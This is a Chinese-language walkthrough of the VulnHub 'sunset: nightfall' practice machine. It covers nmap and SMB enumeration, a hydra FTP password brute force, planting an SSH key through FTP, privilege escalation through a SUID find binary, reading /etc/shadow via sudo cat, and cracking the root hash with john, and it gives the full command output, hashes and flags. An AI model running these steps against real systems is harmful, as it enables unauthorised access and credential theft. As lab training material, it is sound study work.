vulnhub靶机-sunset:nightfall
1、找到靶机ip:192.168.0.125
nmap -sn 192.168.0.0/24
2、扫描靶机端口
root@kali:~# nmap -A -p- 192.168.0.125
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.0.125
Host is up (0.0018s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.0.125:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 a9:25:e1:4f:41:c6:0f:be:31:21:7b:27:e3:af:49:a9 (RSA)
| 256 38:15:c9:72:9b:e0:24:68:7b:24:4b:ae:40:46:43:16 (ECDSA)
|_ 256 9b:50:3b:2c:48:93:e1:a6:9d:b4:99:ec:60:fb:b6:46 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.15-MariaDB-1
| Thread ID: 12
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, FoundRows, SupportsTransactions, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, LongColumnFlag, SupportsCompression, InteractiveClient, SupportsLoadDataLocal, Speaks41ProtocolOld, IgnoreSigpipes, ODBCClient, ConnectWithDatabase, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: jXY7E6z*^zl1J`'?G'+A
|_ Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:65:A7:16 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: NIGHTFALL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h19m58s, deviation: 2h18m34s, median: -1s
|_nbstat: NetBIOS name: NIGHTFALL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: nightfall
| NetBIOS computer name: NIGHTFALL\x00
| Domain name: nightfall
| FQDN: nightfall.nightfall
|_ System time: 2020-07-17T08:30:58-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-07-17T12:30:58
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 1.83 ms 192.168.0.125
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.04 seconds
root@kali:~# 3、访问ftp服务,不允许匿名登录,就先放着
4、访问80端口是apache2的默认页面,也没扫描出目录,先放着
5、smb连接发现没有可以匿名访问的文件夹
使用enum4linux搜集smb信息,找到两个用户名
S-1-22-1-1000 Unix User\nightfall (Local User)
S-1-22-1-1001 Unix User\matt (Local User)
使用这两个用户名做成用户名字典去爆破ftp的用户名和密码,得到matt/cheese
root@kali:~# vim user.txt
root@kali:~# cat user.txt
nightfall
matt
root@kali:~# hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.0.125 ftp -t 64
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 28688798 login tries (l:2/p:14344399), ~448263 tries per task
[DATA] attacking ftp://192.168.0.125:21/
[STATUS] 960.00 tries/min, 960 tries in 00:01h, 28687838 to do in 498:04h, 64 active
[STATUS] 1088.00 tries/min, 3264 tries in 00:03h, 28685534 to do in 439:26h, 64 active
[STATUS] 1088.14 tries/min, 7617 tries in 00:07h, 28681181 to do in 439:18h, 64 active
[STATUS] 1105.13 tries/min, 16577 tries in 00:15h, 28672221 to do in 432:25h, 64 active
[21][ftp] host: 192.168.0.125 login: matt password: cheese
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished
root@kali:~# 6、使用用户名和密码登录ftp服务,查看有什么文件
root@kali:~# ftp 192.168.0.125
Connected to 192.168.0.125.
220 pyftpdlib 1.5.5 ready.
Name (192.168.0.125:root): matt
331 Username ok, send password.
Password: cheese(不可见)
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw------- 1 matt matt 0 Aug 28 2019 .bash_history
-rw-r--r-- 1 matt matt 220 Aug 26 2019 .bash_logout
-rw-r--r-- 1 matt matt 3526 Aug 26 2019 .bashrc
drwx------ 3 matt matt 4096 Aug 28 2019 .gnupg
drwxr-xr-x 3 matt matt 4096 Aug 26 2019 .local
-rw-r--r-- 1 matt matt 807 Aug 26 2019 .profile
-rw------- 1 matt matt 0 Aug 28 2019 .sh_history
226 Transfer complete.
ftp>猜测这个目录应该是matt的家目录,尝试ssh免密登录
root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:y+KE6DAMQdiB066aDJKAiSyUb+J2YIn6lg2k29X4xq8 root@kali
The key's randomart image is:
+---[RSA 3072]----+
|.=o. |
|=oo |
|B+o |
|BBoo |
|B=+ o S |
|Xo.oo... . |
|O*o=.oo o |
|+== .o+. |
| .. .Eo. |
+----[SHA256]-----+
root@kali:~# cat .ssh/id_rsa.pub > authorized_keys
root@kali:~# ftp 192.168.0.125
Connected to 192.168.0.125.
220 pyftpdlib 1.5.5 ready.
Name (192.168.0.125:root): matt
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> mkdir .ssh
257 "/.ssh" directory created.
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw------- 1 matt matt 0 Aug 28 2019 .bash_history
-rw-r--r-- 1 matt matt 220 Aug 26 2019 .bash_logout
-rw-r--r-- 1 matt matt 3526 Aug 26 2019 .bashrc
drwx------ 3 matt matt 4096 Aug 28 2019 .gnupg
drwxr-xr-x 3 matt matt 4096 Aug 26 2019 .local
-rw-r--r-- 1 matt matt 807 Aug 26 2019 .profile
-rw------- 1 matt matt 0 Aug 28 2019 .sh_history
drwxr-xr-x 2 root root 4096 Jul 17 13:52 .ssh
226 Transfer complete.
ftp> cd .ssh
250 "/.ssh" is the current directory.
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
16 bytes sent in 0.00 secs (85.3825 kB/s)
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw-r--r-- 1 root root 16 Jul 17 13:52 authorized_keys
226 Transfer complete.
ftp> exit
221 Goodbye.
root@kali:~# ssh -i .ssh/id_rsa matt@192.168.0.125
Linux nightfall 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u2 (2019-08-08) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Aug 28 18:31:27 2019 from 192.168.1.182
matt@nightfall:~$使用sudo -l的时候需要密码,直接查看有suid权限的文件,看到有/script/find文件
matt@nightfall:~$ find / -perm -4000 2>/dev/null
/scripts/find
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/su
/usr/lib
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
matt@nightfall:~$ 查看属性和文件类型,属主是nightfall用户,可执行文件,应该就是和find命令用法一样
matt@nightfall:~$ ls -l /scripts/find
-rwsr-sr-x 1 nightfall nightfall 315904 Aug 28 2019 /scripts/find
matt@nightfall:~$ file /scripts/find
/scripts/find: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=77494c30a19019ecb995eeb74250aa57c073c635, stripped
matt@nightfall:~$使用/script/find提权到nightfall,拿到第一个flag
bash-5.0$ ls /home
matt nightfall
bash-5.0$ cd /home/nightfall
bash-5.0$ ls
user.txt
bash-5.0$ cat user.txt
97fb7140ca325ed96f67be3c9e30083d
bash-5.0$ 这里使用sudo -l命令的时候还是需要matt的密码,所以复制上传的公钥文件,实现免密登录nightfall
bash-5.0$ ls -la
total 36
drwxr-xr-x 4 nightfall nightfall 4096 Jul 17 10:15 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 nightfall nightfall 0 Aug 28 2019 .bash_history
-rw-r--r-- 1 nightfall nightfall 220 Aug 17 2019 .bash_logout
-rw-r--r-- 1 nightfall nightfall 3526 Aug 17 2019 .bashrc
drwx------ 3 nightfall nightfall 4096 Aug 28 2019 .gnupg
drwxr-xr-x 3 nightfall nightfall 4096 Aug 17 2019 .local
-rw------- 1 nightfall nightfall 337 Aug 17 2019 .mysql_history
-rw-r--r-- 1 nightfall nightfall 807 Aug 17 2019 .profile
-rw------- 1 nightfall nightfall 33 Aug 28 2019 user.txt
bash-5.0$ cp -r /home/matt/.ssh/ .
bash-5.0$ ls -la
total 40
drwxr-xr-x 5 nightfall nightfall 4096 Jul 17 10:16 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 nightfall nightfall 0 Aug 28 2019 .bash_history
-rw-r--r-- 1 nightfall nightfall 220 Aug 17 2019 .bash_logout
-rw-r--r-- 1 nightfall nightfall 3526 Aug 17 2019 .bashrc
drwx------ 3 nightfall nightfall 4096 Aug 28 2019 .gnupg
drwxr-xr-x 3 nightfall nightfall 4096 Aug 17 2019 .local
-rw------- 1 nightfall nightfall 337 Aug 17 2019 .mysql_history
-rw-r--r-- 1 nightfall nightfall 807 Aug 17 2019 .profile
drwxr-xr-x 2 nightfall nightfall 4096 Jul 17 10:16 .ssh
-rw------- 1 nightfall nightfall 33 Aug 28 2019 user.txt
bash-5.0$ cd .ssh
bash-5.0$ ls
authorized_keys
root@kali:~# ssh -i .ssh/id_rsa nightfall@192.168.0.125
Linux nightfall 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u2 (2019-08-08) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Aug 28 18:35:04 2019 from 192.168.1.182
nightfall@nightfall:~$使用sudo -l命令发现可以使用root身份免密执行cat命令,查看/etc/shadow文件
nightfall@nightfall:~$ sudo -l
Matching Defaults entries for nightfall on nightfall:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User nightfall may run the following commands on nightfall:
(root) NOPASSWD: /usr/bin/cat
nightfall@nightfall:~$ sudo cat /etc/shadow
root:$6$JNHsN5GY.jc9CiTg$MjYL9NyNc4GcYS2zNO6PzQNHY2BE/YODBUuqsrpIlpS9LK3xQ6coZs6lonzURBJUDjCRegMHSF5JwCMG1az8k.:18134:0:99999:7:::
daemon:*:18126:0:99999:7:::
bin:*:18126:0:99999:7:::
sys:*:18126:0:99999:7:::
sync:*:18126:0:99999:7:::
games:*:18126:0:99999:7:::
man:*:18126:0:99999:7:::
lp:*:18126:0:99999:7:::
mail:*:18126:0:99999:7:::
news:*:18126:0:99999:7:::
uucp:*:18126:0:99999:7:::
proxy:*:18126:0:99999:7:::
www-data:*:18126:0:99999:7:::
backup:*:18126:0:99999:7:::
list:*:18126:0:99999:7:::
irc:*:18126:0:99999:7:::
gnats:*:18126:0:99999:7:::
nobody:*:18126:0:99999:7:::
_apt:*:18126:0:99999:7:::
systemd-timesync:*:18126:0:99999:7:::
systemd-network:*:18126:0:99999:7:::
systemd-resolve:*:18126:0:99999:7:::
messagebus:*:18126:0:99999:7:::
avahi-autoipd:*:18126:0:99999:7:::
avahi:*:18126:0:99999:7:::
saned:*:18126:0:99999:7:::
colord:*:18126:0:99999:7:::
hplip:*:18126:0:99999:7:::
nightfall:$6$u9n0NMGDN2h3/Npy$y/PVdaqMcdobHf4ZPvbrHNFMwMkPWwamWuKGxn2wqJygEC09UNJNb10X0HBK15Hs4ZwyFtdwixyyfu2QEC1U4/:18134:0:99999:7:::
systemd-coredump:!!:18126::::::
sshd:*:18126:0:99999:7:::
mysql:!:18126:0:99999:7:::
matt:$6$2u38Z1fOk8zIC5kO$oSfp/Ic0Uhb9225EdHB63ugob.B58mPuJJ8YpMB9hNaZAoJk9n3rhs9DHobzmsB20E5Yxjqsnn1x.QGKeAmiR1:18134:0:99999:7:::
nightfall@nightfall:~$ 将root的那一行复制到本地,使用john尝试爆破一下,最后得到root的密码是miguel2
root@kali:~# echo 'root:$6$JNHsN5GY.jc9CiTg$MjYL9NyNc4GcYS2zNO6PzQNHY2BE/YODBUuqsrpIlpS9LK3xQ6coZs6lonzURBJUDjCRegMHSF5JwCMG1az8k.:18134:0:99999:7:::' > shadow.txt
root@kali:~# john shadow.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
miguel2 (root)
1g 0:00:02:01 DONE 2/3 (2020-07-17 22:26) 0.008216g/s 266.6p/s 266.6c/s 266.6C/s miguel2..rafael2
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~#使用root身份ssh的时候不行,应该是被禁了,直接在之前的ssh连接中使用su命令,得到最后的flag。(文件名故意设置的很复杂,怕猜出来直接cat)
nightfall@nightfall:~$ su
Password:
root@nightfall:/home/nightfall# cd ~
root@nightfall:~# ls
root_super_secret_flag.txt
root@nightfall:~# cat root_super_secret_flag.txt
Congratulations! Please contact me via twitter and give me some feedback! @whitecr0w1
.................................................................................................................................................................................................................
.................................................................................................................................................................................................................
.................................................................................................................................................................................................................
.................................................................................................................................................................................................................
.................................................................................................................................................................................................................
.................................................................................................................................................................................................................
.................................................................................................................................................................................................................
.................................................................................................................................................................................................................
.................................................................................................................................................................................................................
.................................................................................................................................................................................................................
.................................................................................................................................................................................................................
................................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@...................................................................................
..............................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.................................................................................
............................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@...............................................................................
..........................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.............................................................................
........................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@...........................................................................
......................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.........................................................................
....................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.......................................................................
...................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@......................................................................
..................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.....................................................................
.................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@....................................................................
................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@...................................................................
................................................................&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&...................................................................
~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~
Thank you for playing! - Felipe Winsnes (whitecr0wz) flag{9a5b21fc6719fe33004d66b703d70a39}
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
root@nightfall:~#
THE END
